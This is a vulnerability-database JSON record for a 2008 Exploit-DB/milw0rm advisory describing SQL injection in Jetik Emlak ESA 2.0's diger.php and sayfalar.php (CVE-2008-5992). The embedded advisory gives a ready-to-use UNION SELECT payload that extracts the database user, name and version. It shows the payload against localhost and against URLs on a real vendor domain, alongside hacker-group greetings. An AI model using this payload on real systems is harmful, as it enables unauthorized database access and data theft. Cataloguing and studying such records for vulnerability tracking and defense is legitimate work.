{"id": "EDB-ID:6549", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Jetik Emlak ESA 2.0 - Multiple SQL Injections", "description": "", "published": "2008-09-24T00:00:00", "modified": "2008-09-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/6549", "reporter": "ZoRLu", "references": [], "cvelist": ["2008-5992"], "immutableFields": [], "lastseen": "2022-01-13T07:05:08", "viewCount": 18, "enchantments": {"dependencies": {}, "score": {"value": 6.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2008-5992"]}]}, "exploitation": null, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/6549", "sourceData": "[~] Jetik Emlak ESA 2.0 System Script\r\n[~]\r\n[~] (KayitNo) multiple remote sql inj\r\n[~]\r\n[~] ----------------------------------------------------------\r\n[~] Discovered By: ZoRLu\r\n[~]\r\n[~] Date: 24.09.2008\r\n[~]\r\n[~] contact: trt-turk@hotmail.com\r\n[~]\r\n[~] contact: zorlu@w.cn\r\n[~] \r\n[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (\r\n[~]\r\n[~] -----------------------------------------------------------\r\n\r\nExploit:\r\n\r\nhttp://localhost/script_path/diger.php?KayitNo=[SQL]\r\n\r\nhttp://localhost/script_path/sayfalar.php?KayitNo=[SQL]\r\n\r\n[SQL]= \r\n\r\n-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\nExample:\r\n\r\nhttp://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\nExample 2:\r\n\r\nhttp://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*\r\n\r\n\r\n\r\n\r\n[~]----------------------------------------------------------------------\r\n[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs\r\n[~]\r\n[~] http://www.z0rlu.blogspot.com online : )\r\n[~]\r\n[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com\r\n[~]\r\n[~]----------------------------------------------------------------------\r\n\r\n# milw0rm.com [2008-09-24]", "osvdbidlist": ["51677", "51676", "48554", "48553"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1647505199}}
{}